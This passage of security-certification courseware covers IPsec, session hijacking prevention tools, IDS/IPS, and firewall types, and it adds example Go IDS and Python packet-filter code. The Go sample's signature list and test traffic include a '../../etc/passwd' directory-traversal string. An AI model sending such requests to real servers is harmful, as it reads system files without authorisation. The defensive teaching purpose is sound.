The structure of the IPsec architecture is as follows.
▪ Authentication Header (AH): It offers integrity and data origin authentication, with optional anti-replay features.
▪ Encapsulating Security Payload (ESP): It offers all the services offered by AH as well as confidentiality.
▪ IPsec Domain of Interpretation (DOI): It defines the payload formats, types of exchange, and naming conventions for security information such as cryptographic algorithms or security policies. IPsec DOI instantiates ISAKMP for use with IP when IP uses ISAKMP to negotiate security associations.
▪ Internet Security Association and Key Management Protocol (ISAKMP): It is a key protocol in the IPsec architecture that establishes the required security for various communications over the Internet, such as government, private, and commercial communications, by combining the security concepts of authentication, key management, and security associations.
▪ Policy: IPsec policies are useful in providing network security. They define when and how to secure data, as well as security methods to use at different levels in the network. One can configure IPsec policies to meet the security requirements of a system, domain, site, organizational unit, and so on.

Figure 11.38: IPsec architecture
IPsec Authentication and Confidentiality
IPsec uses two different security services for authentication and confidentiality.
▪ Authentication Header (AH): It is useful in providing connectionless integrity and data origin authentication for IP datagrams and anti-replay protection for the data payload and some portions of the IP header of each packet. However, it does not support data confidentiality (no encryption). A receiver can select the service to protect against replays, which is an optional service on establishing a security association (SA).
▪ Encapsulation Security Payload (ESP): In addition to the services (data origin authentication, conn Xectionless integrity, and anti-replay service) provided by AH, the ESP protocol offers confidentiality. Unlike AH, ESP does not provide integrity and authentication for the entire IP packet in the transport mode. ESP can be applied alone, in conjunction with AH, or in a nested manner. It protects only the IP data payload in the default setting. In the tunnel mode, it protects both the payload and IP header.

Session Hijacking Prevention Tools
To prevent session hijacking, the security testing of web applications and the analysis of static code to identify vulnerabilities in web applications are required. Identifying vulnerabilities at an early stage helps in implementing security measures to protect against session hijacking attacks.
▪ CxSAST
Source: https://www.checkmarx.com
Checkmarx CxSAST is a unique source-code analysis solution that provides tools for identifying, tracking, and repairing technical and logical flaws in source code, such as security vulnerabilities, compliance issues, and business logic problems. CxSAST supports open-source analysis (CxOSA), enabling licensing and compliance management, vulnerability alerts, policy enforcement, and reporting. This tool supports a wide range of OS platforms, programming languages, and frameworks. Security professionals can use this tool to prevent various session hijacking attacks such as MITM attacks, session fixation attacks, and XSS attacks.

▪ Fiddler
Source: https://www.telerik.com
Fiddler is used for performing web-application security tests such as the decryption of HTTPS traffic and manipulation of requests using an MITM decryption technique. Fiddler is a web debugging proxy that logs all HTTP(S) traffic between a computer and the Internet. Security professionals can use Fiddler to test web applications by debugging the traffic from systems as well as manipulating and editing web sessions.

Figure 11.41: Screenshot of Fiddler
The following are some additional session hijacking prevention tools:
▪ Nessus (https://www.tenable.com)
▪ Netsparker (https://www.netsparker.com)
▪ Wapiti (http://wapiti.sourceforge.net)
▪ WebWatchBot (https://www.exclamationsoft.com)

Module Summary
In this module, we discussed concepts related to session hijacking, along with different types of session hijacking. We also discussed in detail application level and network level session hijacking attacks. Furthermore, this module presented various session hijacking tools. It also discussed how to detect, protect, and defend against session hijacking attacks, in addition to various session hijacking detection and prevention tools. This module ended with a detailed discussion on various countermeasures to be employed to prevent session hijacking attempts by threat actors.
In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, evade network security components such as IDSs and firewalls to compromise network infrastructure.
Module 12: Evading IDS, Firewalls, and Honeypots

Module Objectives
The widespread use of the Internet throughout the business world has boosted network usage in general. Organizations adopt various network security measures such as firewalls, intrusion detection systems (IDS), intrusion prevention systems (IPS), and "honeypots" to protect their networks. Networks are the most preferred targets of hackers for compromising an organization's security, and attackers continue to find new ways to evade network security measures and attack these targets.

This module provides deep insights into various network security technologies, such as IDS, IPS, firewalls, and honeypots. It explains the operations of these components as well as the various techniques used by attackers to evade them. Further, it describes the countermeasures necessary to prevent such attacks.

At the end of this module, you will be able to:
▪ Describe IDS, IPS, firewall, and honeypot concepts
▪ Use different IDS, IPS, firewall, and honeypot solutions
▪ Explain different techniques to bypass IDS
▪ Explain various techniques to bypass firewalls
▪ Use tools to evade different IDS/firewalls
▪ Explain different techniques to detect honeypots
▪ Adopt countermeasures against IDS/firewall evasion

Module Flow

IDS, IPS, Firewall, and Honeypot Concepts
Ethical hackers should have an idea about the function, role, placement, and design of firewalls, IDS, IPS, and honeypots to protect an organization's network by understanding how an attacker evades such security measures. This section provides an overview of these basic concepts.

Intrusion Detection System (IDS)


An intrusion detection system (IDS) is a security software or hardware device used to monitor, detect, and protect networks or systems from malicious activities; it alerts the concerned security personnel immediately upon detecting intrusions. IDS are extremely useful as they monitor the inbound/outbound traffic of the network and check for suspicious activities continuously to detect a network or system security breach. Specifically, they check traffic for signatures that match known intrusion patterns and raise an alarm when a match is detected. IDS can be categorized into active and passive IDS depending on their functionality. A passive IDS generally only detects intrusions while an active IPS not only detects intrusions in the network but also prevents them.
Main Functions of IDS:
▪ An IDS gathers and analyzes information from within a computer or a network to identify possible violations of the security policy, including unauthorized access, as well
▪ An IDS is also referred to as a "packet sniffer," which intercepts packets traveling via various communication media and protocols, usually TCP/IP. The packets are analyzed after they are captured.
▪ An IDS evaluates traffic for suspected intrusions and raises an alarm upon detecting such intrusions.
Where IDS resides in the network
One of the most common places to deploy an IDS is near the firewall. Depending on the traffic to be monitored, an IDS is placed outside/inside the firewall to monitor suspicious traffic

originating from outside/inside the network. When placed inside, the IDS will be ideal if it is near a DMZ; however, the best practice is to use a layered defense by deploying one IDS in front of the firewall and another one behind the firewall in the network.
Before deploying the IDS, it is essential to analyze the network topology, understand how the traffic flows to and from the resources that an attacker can use to gain access to the network, and identify the critical components that will be possible targets of various attacks against the network. After the position of the IDS in the network is determined, the IDS must be configured to maximize its network protection effect.
Figure 12.1: Placement of IDS

The primary purpose of the IDS is to provide real-time monitoring and detection of intrusions. Additionally, reactive IDS (and IPS) can intercept, respond to, and/or prevent intrusions.
An IDS works as follows:
▪ IDS have sensors to detect malicious signatures in data packets, and some advanced IDS include behavioral activity detection to detect malicious traffic behavior. Even if the packet signatures do not match perfectly with the signatures in the IDS signature database, the activity detection system can alert administrators about possible attacks.
▪ If the signature matches, the IDS performs predefined actions such as terminating the connection, blocking the IP address, dropping the packet, and/or raising an alarm to notify the administrator.
▪ When a signature matches, anomaly detection will be skipped; otherwise, the sensor may analyze traffic patterns for an anomaly.
▪ When the packet passes all the tests, the IDS will forward it to the network.

Figure 12.2: Working of IDS
How an IDS Detects an Intrusion?
An IDS uses three methods to detect intrusions in the network.
▪ Signature Recognition
Signature recognition, also known as misuse detection, tries to identify events that indicate an abuse of a system or network. This technique involves first creating models of possible intrusions and then comparing these models with incoming events to make a detection decision. The signatures for IDS were created under the assumption that the model must detect an attack without disturbing normal system traffic. Only attacks should match the model; otherwise, false alarms could occur.
o Signature-based intrusion detection compares incoming or outgoing network packets with the binary signatures of known attacks using simple pattern-matching techniques to detect intrusions. Attackers can define a binary signature for a specific portion of the packet, such as TCP flags.
o Signature recognition can detect known attacks. However, there is a possibility that other innocuous packets contain the same signature, which will trigger a false positive alert.
o Improper signatures may trigger false alerts. To detect misuse, a massive number of signatures are required. The more the signatures, the greater the chances of the IDS detecting attacks; however, the traffic may incorrectly match with the signatures, thus impeding system performance.
o A large amount of signature data requires more network bandwidth. IDS compare signatures of data packets against those in the signature database. An increase in the number of signatures in the database could result in the dropping of certain packets.
o New virus attacks such as URSNIF and VIRLOCK have driven the need for multiple signatures for a single attack. Changing a single bit in some attack strings can invalidate a signature generated for that attack. Therefore, entirely new signatures are required to detect a similar attack.
o Despite the problems with signature-based IDS, such systems are popular, and they work well when configured correctly and monitored closely.
▪ Anomaly Detection
Anomaly detection, or "not-use detection," differs from signature recognition. Anomaly detection involves a database of anomalies. An anomaly is detected when an event occurs outside the tolerance threshold of normal traffic. Therefore, any deviation from regular use is an attack. Anomaly detection detects intrusions based on the fixed behavioral characteristics of the users and components in a computer system.
o Establishing a model of normal use is the most challenging step in creating an anomaly detector.
o In the traditional method of anomaly detection, essential data are kept for checking variations in network traffic. However, in reality, there is some unpredictability in network traffic, and there are too many statistical variations, thus making these models imprecise. Some events labeled as anomalies might only be irregularities in network usage.
o In this type of approach, the inability to construct a model thoroughly on a regular network is a concern. These models should be used to check specific networks.
▪ Protocol Anomaly Detection
Protocol anomaly detection depends on the anomalies specific to a protocol. It identifies particular flaws in vendors' deployment of the TCP/IP protocol. Protocols are designed according to RFC specifications, which dictate standard handshakes to permit universal communication. The protocol anomaly detector can identify new attacks. There are new attack methods and exploits that violate protocol standards.
o Malicious anomaly signatures are becoming increasingly common. By contrast, the network protocol is well defined and is changing slowly. Therefore, the signature database should frequently be updated to detect attacks.
o Protocol anomaly detectors are different from traditional IDS in terms of how they present alarms. The best way to present alarms is to explain which part of the state system is compromised. For this purpose, IDS operators must have thorough knowledge of protocol design.
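The following Go program is an added example (not from the courseware) that puts the working sequence from "How an IDS Works" and the three detection methods above together in one detector: signature recognition runs first and, on a match, the anomaly checks are skipped; a protocol-anomaly check then looks for a TCP flag combination that no standard handshake produces; finally a statistical anomaly check compares connection attempts per source against a baseline, and a packet that passes everything is counted as forwarded. The signature database, the baseline, and the traffic batch are constructed sample data.

```go
package main

import (
	"bytes"
	"fmt"
)

// Event is one observed packet reduced to the fields the detector inspects (constructed sample format).
type Event struct {
	Src, Dst string
	Proto    string // "tcp" or "udp"
	Flags    string // TCP flags as letters: S=SYN, A=ACK, F=FIN, P=PSH, R=RST
	Payload  []byte
}

// Signature is one misuse-detection rule: a byte pattern known to occur in an attack.
type Signature struct {
	Name    string
	Pattern []byte
}

// Alert records which of the three methods fired and why.
type Alert struct {
	Method string // "signature", "protocol-anomaly" or "anomaly"
	Detail string
	Event  Event
}

// IDS holds the signature database plus the state the statistical anomaly detector needs.
type IDS struct {
	sigs        []Signature
	synBaseline int            // SYNs per source that the "model of normal use" allows
	synCount    map[string]int // SYNs seen per source so far
}

func NewIDS(sigs []Signature, synBaseline int) *IDS {
	return &IDS{sigs: sigs, synBaseline: synBaseline, synCount: map[string]int{}}
}

// hasFlag reports whether the single-letter flag f appears in the flag string.
func hasFlag(flags string, f byte) bool {
	return bytes.IndexByte([]byte(flags), f) >= 0
}

// Inspect applies the methods in the order the text gives: signature recognition first, and a match
// skips the anomaly checks. Otherwise a protocol-anomaly check (SYN and FIN together, which RFC 793
// never produces) and then a statistical anomaly check run. A nil result means the packet is forwarded.
func (ids *IDS) Inspect(e Event) *Alert {
	for _, s := range ids.sigs {
		if bytes.Contains(e.Payload, s.Pattern) {
			return &Alert{Method: "signature", Detail: s.Name, Event: e}
		}
	}
	if e.Proto == "tcp" && hasFlag(e.Flags, 'S') && hasFlag(e.Flags, 'F') {
		return &Alert{Method: "protocol-anomaly", Detail: "SYN and FIN set in the same segment", Event: e}
	}
	if e.Proto == "tcp" && e.Flags == "S" {
		ids.synCount[e.Src]++
		if ids.synCount[e.Src] > ids.synBaseline {
			return &Alert{Method: "anomaly", Event: e,
				Detail: fmt.Sprintf("%d connection attempts from %s exceed baseline %d", ids.synCount[e.Src], e.Src, ids.synBaseline)}
		}
	}
	return nil
}

// Run inspects a batch and returns the alerts raised and how many packets were forwarded.
func (ids *IDS) Run(events []Event) ([]Alert, int) {
	var alerts []Alert
	forwarded := 0
	for _, e := range events {
		if a := ids.Inspect(e); a != nil {
			alerts = append(alerts, *a)
		} else {
			forwarded++
		}
	}
	return alerts, forwarded
}

// SampleSignatures is a constructed two-entry signature database for the demo.
func SampleSignatures() []Signature {
	return []Signature{
		{Name: "directory traversal to /etc/passwd", Pattern: []byte("../../etc/passwd")},
		{Name: "beacon string of a hypothetical malware family", Pattern: []byte("EXAMPLE-C2-BEACON-v1")},
	}
}

// SampleTraffic is a constructed batch: one normal request, one signature hit,
// one impossible flag combination, and six SYNs from a single source.
func SampleTraffic() []Event {
	events := []Event{
		{Src: "10.0.0.5", Dst: "10.0.1.7", Proto: "tcp", Flags: "PA", Payload: []byte("GET /index.html HTTP/1.1")},
		{Src: "10.0.0.9", Dst: "10.0.1.7", Proto: "tcp", Flags: "PA", Payload: []byte("GET /../../etc/passwd HTTP/1.1")},
		{Src: "10.0.0.9", Dst: "10.0.1.7", Proto: "tcp", Flags: "SF"},
	}
	for i := 0; i < 6; i++ {
		events = append(events, Event{Src: "10.0.0.42", Dst: "10.0.1.7", Proto: "tcp", Flags: "S"})
	}
	return events
}

func main() {
	ids := NewIDS(SampleSignatures(), 5)
	alerts, forwarded := ids.Run(SampleTraffic())
	for _, a := range alerts {
		fmt.Printf("[%s] %s (from %s)\n", a.Method, a.Detail, a.Event.Src)
	}
	fmt.Println("forwarded:", forwarded)
}
```

With a baseline of five, the first five SYNs from 10.0.0.42 are forwarded and the sixth raises the anomaly alert, which illustrates the text's point that the hardest part of anomaly detection is choosing the model of normal use: a baseline set too low turns ordinary bursts into false positives, one set too high misses slow probes.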

General Indications of Intrusions
Intrusion attempts on networks, systems, or file systems can be identified by following some general indicators:
▪ File System Intrusions
By observing system files, the presence of an intrusion can be identified. System files record the activities of the system. Any modification or deletion of the file attributes or the file itself is a sign that the system has been a target of an attack:
o If you find new, unknown files/programs on your system, then there is a possibility that the system has been intruded into. The system can be compromised to the extent that it can, in turn, compromise other network systems.
o When an intruder gains access to a system, he or she tries to escalate privileges to gain administrative access. When the intruder obtains administrator privileges, he/she could change file permissions, for example, from read-only to write.
o Unexplained modifications in file size are also an indication of an attack. Make sure you analyze all your system files.
o The presence of rogue suid and sgid files on your Linux system that do not match your master list of suid and sgid files could indicate an attack.
o You can identify unfamiliar file names in directories, including executable files with strange extensions and double extensions.
o Missing files are also a sign of a probable intrusion/attack.

▪ Network Intrusions
Similarly, general indications of network intrusions include:
o A sudden increase in bandwidth consumption
o Repeated probes of the available services on your machines
o Connection requests from IPs other than those in the network range, which imply that an unauthenticated user (intruder) is attempting to connect to the network
o Repeated login attempts from remote hosts
o A sudden influx of log data, which could indicate attempts at DoS attacks, bandwidth consumption, and DDoS attacks
▪ System Intrusions
Similarly, general indications of system intrusions include:
o Sudden changes in logs such as short or incomplete logs
o Unusually slow system performance
o Missing logs or logs with incorrect permissions or ownership
o Modifications to system software and configuration files
o Unusual graphic displays or text messages
o Gaps in system accounting
o System crashes or reboots
o Unfamiliar processes

Types of Intrusion Detection Systems
There are two types of intrusion detection systems:
▪ Network-Based Intrusion Detection Systems
Network-based intrusion detection systems (NIDS) check every packet entering the network for the presence of anomalies and incorrect data. By limiting the firewall to drop large numbers of data packets, the NIDS checks every packet thoroughly. A NIDS captures and inspects all traffic. It generates alerts at the IP or application level based on the content. NIDS are more distributed than host-based IDS. The NIDS identifies the anomalies at the router and host levels. It audits the information contained in the data packets and logs the information of malicious packets; furthermore, it assigns a threat level to each risk after receiving the data packets. The threat level enables the security team to remain on alert. These mechanisms typically consist of a black box placed on the network in a promiscuous mode, listening for patterns indicative of an intrusion. It detects malicious activity such as DoS attacks, port scans, or even attempts to break into computers by monitoring network traffic.
Figure 12.3: Network-based Intrusion Detection Systems

▪ Host-Based Intrusion Detection Systems
A host-based IDS (HIDS) analyzes each system's behavior. The HIDS can be installed on any system ranging from a desktop PC to a server. It is more versatile than the NIDS. In addition to detecting unauthorized insider activity, host-based systems are also effective in detecting unauthorized file modification. The HIDS focuses on the changing aspects of local systems. It is also more platform-centric, with a greater focus on the Windows OS; nevertheless, other HIDS are available for UNIX platforms. These mechanisms usually include auditing events that occur on a specific host. They are not very common because of the overhead they incur by having to monitor each system event.

Figure 12.4: Host-based IDS (HIDS)
Types of IDS Alerts
An IDS generates four types of alerts: True Positive, False Positive, False Negative, and True Negative.
- True Positive (Attack, Alert): A true positive is a condition that occurs when an event triggers an alarm and causes the IDS to react as if a real attack is in progress. The event may be an actual attack, in which case an attacker attempts to compromise the network, or it may be a drill, in which case security personnel use hacker tools to test a network segment.
- False Positive (No attack, Alert): A false positive occurs if an event triggers an alarm when no actual attack is in progress. It occurs when an IDS treats regular system activity as an attack. False positives tend to make users insensitive to alarms and weaken their reactions to actual intrusion events. While testing the configuration of an IDS, administrators use false positives to determine whether the IDS can distinguish between false positives and real attacks.
- False Negative (Attack, No Alert): A false negative is a condition that occurs when an IDS fails to react to an actual attack event. This condition is the most dangerous failure, as the purpose of an IDS is to detect and respond to attacks.
- True Negative (No attack, No Alert): A true negative is a condition that occurs when an IDS identifies an activity as acceptable behavior and the activity is acceptable. A true negative means successfully ignoring acceptable behavior. It is not harmful, as the IDS performs as expected in this case.

Intrusion Prevention System (IPS)

Intrusion prevention systems (IPS) are considered as active IDS, as they are capable of not only detecting intrusions but also preventing them. IPS are continuous monitoring systems that often sit behind firewalls as an additional layer of protection. Unlike IDS, which are passive, IPS are placed between the source and the destination, inline in the network, to actively analyze the network traffic and make automated decisions regarding the traffic that is entering the network.
Some of the actions that an IPS is meant to perform are as follows:
- Generate alerts if any abnormal traffic is detected in the network
- Continuously record real-time logs of network activities
- Detect and filter malicious traffic
- Block and eliminate threats quickly, as it is placed inline in the operational network
- Identify threats accurately without generating false positives
An IPS takes actions based on certain rules and policies configured into it. In other words, the IPS can identify, log, and prevent the occurrence of any intrusion or attack in the network. IPS can also be employed to detect critical issues in corporate security policies such as notorious insider threats, malicious network guests, etc.
Classification of IPS:
Like IDS, IPS are also classified into two types:
- Host-based IPS
- Network-based IPS

Advantages of IPS over IDS:
- Unlike IDS, IPS can block as well as drop illegal packets in the network
- IPS can be used to monitor activities occurring in a single organization
- IPS can prevent the occurrence of direct attacks in the network by controlling the amount of network traffic

Figure 12.5: Example of an IPS placement

Firewall
A firewall is a software- or hardware-based system located at the network gateway that protects the resources of a private network from unauthorized access by users on other networks. They are placed at the junction or gateway between two networks, usually a private network and a public network such as the Internet. Firewalls examine all the messages entering or leaving the intranet and block those that do not meet the specified security criteria. Firewalls may be concerned with the type of traffic or with the source or destination addresses and ports. They include a set of tools that monitor the flow of traffic between networks. A firewall placed at the network level and working closely with the router filters all the network packets to determine whether to forward them toward their destinations. Always install firewalls away from the rest of the network, so that none of the incoming requests can gain direct access to a private network resource. If appropriately configured, the firewall protects systems on one side of it from systems on the other side. A firewall is an intrusion detection mechanism that is designed by an organization's security policy. Its settings can change to make appropriate changes to its functionality.
Firewalls can be configured to restrict incoming traffic to POP and SMTP and to enable email access. Certain firewalls block specific email services to avoid spam.
A firewall can be configured to check inbound traffic at a "checkpoint," where a security audit is performed. It can also act as an active "phone tap" tool for identifying an intruder's attempt to dial into modems in a secured network. Firewall logs consist of logging information that notifies the administrator about all attempts to access various services.

The firewall verifies the incoming and outgoing traffic against its rules and acts as a router to move data between networks. The firewall allows or denies access requests made from one side of it to services on the other side. Identify all the attempts to log in to the network for auditing. Unauthorized attempts can be identified by embedding an alarm that is triggered when an unauthorized user attempts to log in. Firewalls can filter packets based on the address and type of traffic. They recognize the source and destination addresses as well as port numbers during address filtering, and they identify the types of network traffic during protocol filtering. Firewalls can identify the state and attributes of data packets.

Figure 12.6: Example of Firewall

Firewall Architecture
The firewall architecture consists of the following elements:
Bastion Host
The bastion host is designed for defending the network against attacks. It acts as a mediator between inside and outside networks. A bastion host is a computer system designed and configured to protect network resources from attacks. Traffic entering or leaving the network passes through the firewall. It has two interfaces:
o Public interface directly connected to the Internet
o Private interface connected to the intranet

Figure 12.7: Bastion Host Firewall
Screened Subnet
A screened subnet (DMZ) is a protected network created with a two- or three-homed firewall behind a screening firewall, and it is a term that is commonly used to refer to the DMZ. When using a three-homed firewall, connect the first interface to the Internet, the second to the DMZ, and the third to the intranet. The DMZ responds to public requests and has no hosts accessed by the private network. Internet users cannot access the private zone.
The advantage of screening a subnet away from the intranet is that public requests can be responded to without allowing traffic into the intranet. A disadvantage of the three-homed firewall is that if it is compromised, both the DMZ and the intranet could also be compromised. A safer technique is to use multiple firewalls to separate the Internet from the DMZ, and then separate the DMZ from the intranet.

Figure 12.8: Screened Subnet Firewall
Multi-homed Firewall
A multi-homed firewall is a node with multiple NICs that connects to two or more networks. It connects each interface to separate network segments logically and physically. A multi-homed firewall helps in increasing the efficiency and reliability of an IP network. The multi-homed firewall has more than three interfaces that allow for further subdividing the systems based on the specific security objectives of the organization. However, the model that provides deeper protection is the back-to-back firewall.

Figure 12.9: Multi-homed Firewall

Demilitarized Zone (DMZ)
In computer networks, the demilitarized zone (DMZ) is an area that hosts computer(s) or a small sub-network placed as a neutral zone between a particular company's internal network and an untrusted external network to prevent outsider access to a company's private data. The DMZ serves as a buffer between the secure internal network and the insecure Internet, as it adds a layer of security to the corporate LAN, thus preventing direct access to other parts of the network.
A DMZ is created using a firewall with three or more network interfaces that are assigned specific roles, such as an internal trusted network, a DMZ network, or an external untrusted network (Internet). Any service such as email, web, or FTP that provides access to external users can be placed in the DMZ. However, web servers that communicate with database servers cannot reside in the DMZ, as they could give outside users direct access to sensitive information. There are many ways in which the DMZ can be configured according to specific network topologies and company requirements.

Figure 12.10: Demilitarized Zone (DMZ)

Types of Firewalls
There are two types of firewalls.
- Hardware Firewalls
A hardware firewall is a dedicated firewall device placed on the perimeter of the network. It is an integral part of the network setup and is also built into broadband routers or used as a standalone product. A hardware firewall helps to protect systems on the local network and performs effectively with little or no configuration. It employs the technique of packet filtering. It reads the header of a packet to find out the source and destination addresses, and compares them with a set of predefined and/or user-created rules that determine whether it should forward or drop the packet. A hardware firewall functions on an individual system or a particular network connected using a single interface. Examples of hardware firewalls include Cisco ASA and FortiGate. Hardware firewalls protect the private local area network. However, hardware firewalls are expensive as well as difficult to implement and upgrade.
Advantages:
o Security: A hardware firewall with its operating system (OS) is considered to reduce security risks and increase the level of security controls.
o Speed: Hardware firewalls initiate faster responses and enable more traffic.
o Minimal interference: Since a hardware firewall is a separate network component, it enables better management and allows the firewall to shut down, move, or be reconfigured without much interference in the network.

Disadvantages:
o More expensive than a software firewall.
o Difficult to implement and configure.
o Consumes more space and involves cabling.

Figure 12.11: Hardware Firewall
- Software Firewalls
A software firewall is similar to a filter. It sits between a regular application and the networking components of the OS. It is more useful for individual home users and it is suitable for mobile users who need digital security when working outside the corporate network. Further, it is easy to install on an individual's PC, notebook, or workgroup server. It helps protect your system from outside attempts at unauthorized access and provides protection against everyday Trojans and email worms. It includes privacy controls, web filtering, and more. A software firewall implants itself in the critical area of the application/network path. It analyzes the data flow against the rule set.
The configuration of a software firewall is simple compared to that of a hardware firewall. A software firewall intercepts all requests from a network to the computer to determine if they are valid and protects the computer from attacks and unauthorized access. It incorporates user-defined controls, privacy controls, web filtering, content filtering, etc., to restrict unsafe applications from running on an individual system. Software firewalls use more resources than hardware firewalls, which reduces the speed of the system. Examples of software firewalls include those produced by Norton, McAfee, and Kaspersky.
Advantages:
o Less expensive than hardware firewalls.
o Ideal for personal or home use.
o Easier to configure and reconfigure.
Disadvantages:
o Consumes system resources.
o Difficult to uninstall.
o Not appropriate for environments requiring faster response times.

Figure 12.12: Software Firewall

Firewall Technologies
Firewalls are designed and developed with the help of different firewall services. Each firewall service provides security depending on its efficiency and sophistication. There are different types of firewall technologies depending on where the communication is taking place, where the traffic is intercepted in the network, the state that is traced, and so on. Considering the capabilities of different firewalls, it is easy to choose and place an appropriate firewall to meet the security requirements in the best possible way. Each type of firewall has its advantages. Several firewall technologies are available for organizations to implement their security measures. Sometimes, firewall technologies are combined with other technologies to build another firewall technology. For example, NAT is a routing technology; however, when it is combined with a firewall, it is considered a firewall technology.
The various firewall technologies are listed below:
- Packet Filtering
- Circuit-Level Gateways
- Application-Level Firewall
- Stateful Multilayer Inspection
- Application Proxies
- Virtual Private Network
- Network Address Translation

The table below summarizes technologies operating at each OSI layer:

OSI Layer      Firewall Technology
Application    Virtual Private Network (VPN); Application Proxies
Presentation   Virtual Private Network (VPN)
Session        Virtual Private Network (VPN); Circuit-Level Gateways
Transport      Virtual Private Network (VPN); Packet Filtering
Network        Virtual Private Network (VPN); Network Address Translation (NAT); Packet Filtering; Stateful Multilayer Inspection
Data Link      Virtual Private Network (VPN); Packet Filtering
Physical       Not Applicable

Table 12.1: Firewall Technologies
The security levels of these technologies vary according to their efficiency levels. A comparison of these technologies can be made by allowing them to pass through the OSI layers between the hosts. The data passes through the intermediate layers from a higher layer to a lower layer. Each layer adds additional information to the data packets. The lower layer now sends the obtained information through the physical network to the upper layers and then to its destination.

Packet Filtering Firewall
In a packet filtering firewall, each packet is compared with a set of criteria before it is forwarded. Depending on the packet and the criteria, the firewall can drop the packet, forward it, or send a message to the originator. The rules can include the source and the destination IP address, the source and the destination port number, and the protocol used. It works at the internet layer of the TCP/IP model or the network layer of the OSI model. Packet filtering firewalls focus on individual packets, analyze their header information, and determine which way they need to be directed. Traditional packet filters make this decision according to the following information in a packet:
- Source IP address: Used to check whether the packet is coming from a valid source. The information about the source IP address can be found from the IP header of the packet.
- Destination IP address: Checks if the packet is going to the correct destination and if the destination accepts these types of packets. The information about the destination IP address can be found from the IP header of the packet.
- Source TCP/UDP port: Used to check the source port of the packet.
- Destination TCP/UDP port: Used to monitor the destination port regarding the services to be allowed and the services to be denied.
- TCP flag bits: Used to check whether the packet has SYN, ACK, or other bits set for the connection to be made.
- Protocol in use: Used to check whether the protocol that the packet is carrying should be allowed.
- Direction: Used to check whether the packet is entering or leaving the private network.
- Interface: Used to check whether the packet is coming from an unreliable zone.
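The decision procedure just listed can be written out as a small rule engine that evaluates exactly those header fields, first match wins, deny by default. This is an added example, not code from the courseware or from any firewall vendor; the rule and packet field names, the 10.0.0.0/24 network, interface name "wan0" and the sample policy are constructed for illustration.

```python
"""Stateless packet filter built on the header criteria listed above.

Added example, not part of the EC-Council courseware. The rule fields,
packet fields, addresses and the sample policy are constructed for
illustration.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# The three outcomes named in the text: drop silently, forward, or reject
# (drop and send a message such as an ICMP error back to the originator).
DROP, FORWARD, REJECT = "drop", "forward", "reject"


@dataclass(frozen=True)
class Packet:
    src_ip: str
    dst_ip: str
    protocol: str             # "tcp", "udp" or "icmp"
    src_port: Optional[int]   # None for protocols without ports
    dst_port: Optional[int]
    tcp_flags: frozenset      # e.g. frozenset({"SYN"})
    direction: str            # "in" = entering the private network, "out" = leaving it
    interface: str            # interface the packet arrived on


@dataclass
class Rule:
    """One filter rule; a field left as None means 'match anything'."""
    action: str
    src_net: Optional[str] = None       # CIDR, e.g. "10.0.0.0/24"
    dst_net: Optional[str] = None
    protocol: Optional[str] = None
    src_port: Optional[int] = None
    dst_port: Optional[int] = None
    flags_required: frozenset = frozenset()
    flags_forbidden: frozenset = frozenset()
    direction: Optional[str] = None
    interface: Optional[str] = None

    def matches(self, p: Packet) -> bool:
        return all((
            self.src_net is None or ip_address(p.src_ip) in ip_network(self.src_net),
            self.dst_net is None or ip_address(p.dst_ip) in ip_network(self.dst_net),
            self.protocol is None or self.protocol == p.protocol,
            self.src_port is None or self.src_port == p.src_port,
            self.dst_port is None or self.dst_port == p.dst_port,
            self.flags_required <= p.tcp_flags,
            not (self.flags_forbidden & p.tcp_flags),
            self.direction is None or self.direction == p.direction,
            self.interface is None or self.interface == p.interface,
        ))


def filter_packet(rules: List[Rule], p: Packet, default: str = DROP) -> str:
    """First matching rule wins; unmatched packets get the default (deny by default)."""
    for rule in rules:
        if rule.matches(p):
            return rule.action
    return default


# Constructed policy: private network 10.0.0.0/24, Internet-facing interface "wan0".
RULES = [
    # Anti-spoofing: a packet arriving from the Internet may not claim an inside source.
    Rule(action=DROP, src_net="10.0.0.0/24", direction="in", interface="wan0"),
    # New inbound SMTP connections to the mail server only (SYN set, ACK clear).
    Rule(action=FORWARD, dst_net="10.0.0.25/32", protocol="tcp", dst_port=25,
         flags_required=frozenset({"SYN"}), flags_forbidden=frozenset({"ACK"}),
         direction="in", interface="wan0"),
    # Inbound Telnet is refused with a message to the originator.
    Rule(action=REJECT, protocol="tcp", dst_port=23, direction="in"),
    # Inside hosts may open HTTPS connections outward.
    Rule(action=FORWARD, src_net="10.0.0.0/24", protocol="tcp", dst_port=443, direction="out"),
]


def tcp(src_ip, src_port, dst_ip, dst_port, flags, direction, interface="wan0") -> Packet:
    """Helper to build a TCP packet for the demo and tests."""
    return Packet(src_ip, dst_ip, "tcp", src_port, dst_port, frozenset(flags), direction, interface)


if __name__ == "__main__":
    samples = {
        "spoofed inside source from Internet": tcp("10.0.0.5", 4444, "10.0.0.25", 25, {"SYN"}, "in"),
        "new SMTP connection to mail server": tcp("198.51.100.9", 4000, "10.0.0.25", 25, {"SYN"}, "in"),
        "inbound Telnet attempt": tcp("198.51.100.9", 4001, "10.0.0.40", 23, {"SYN"}, "in"),
        "outbound HTTPS from inside host": tcp("10.0.0.7", 50000, "203.0.113.10", 443, {"SYN"}, "out", "lan0"),
        # The reply to that HTTPS request: a stateless filter has no memory of the
        # outbound SYN, so it falls to the default and is dropped.
        "HTTPS reply to inside host": tcp("203.0.113.10", 443, "10.0.0.7", 50000, {"SYN", "ACK"}, "in"),
    }
    for label, pkt in samples.items():
        print(f"{label:40s} -> {filter_packet(RULES, pkt)}")
```

The last sample shows the limitation that the stateful inspection section later addresses: without connection memory, legitimate replies can only be admitted by opening broad inbound rules.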

Figure 12.13: Example of Packet Filtering Firewall
Circuit-Level Gateway Firewall
A circuit-level gateway firewall works at the session layer of the OSI model or the transport layer of TCP/IP. It forwards data between networks without verification and blocks incoming packets from the host but allows the traffic to pass through itself. Information passed to remote computers through a circuit-level gateway will appear to have originated from the gateway, as the incoming traffic carries the IP address of the proxy (circuit-level gateway). Such firewalls monitor requests to create sessions and determine if those sessions will be allowed.

A circuit-level gateway gives controlled access to network services and host requests. To determine whether a requested session is valid, it checks the TCP handshake between packets. Circuit proxy firewalls allow or prevent data streams; they do not filter individual packets. They are relatively inexpensive and hide the information about the private network that they protect.

Figure 12.14: Example of Circuit-Level Gateway Firewall

Application-Level Firewall
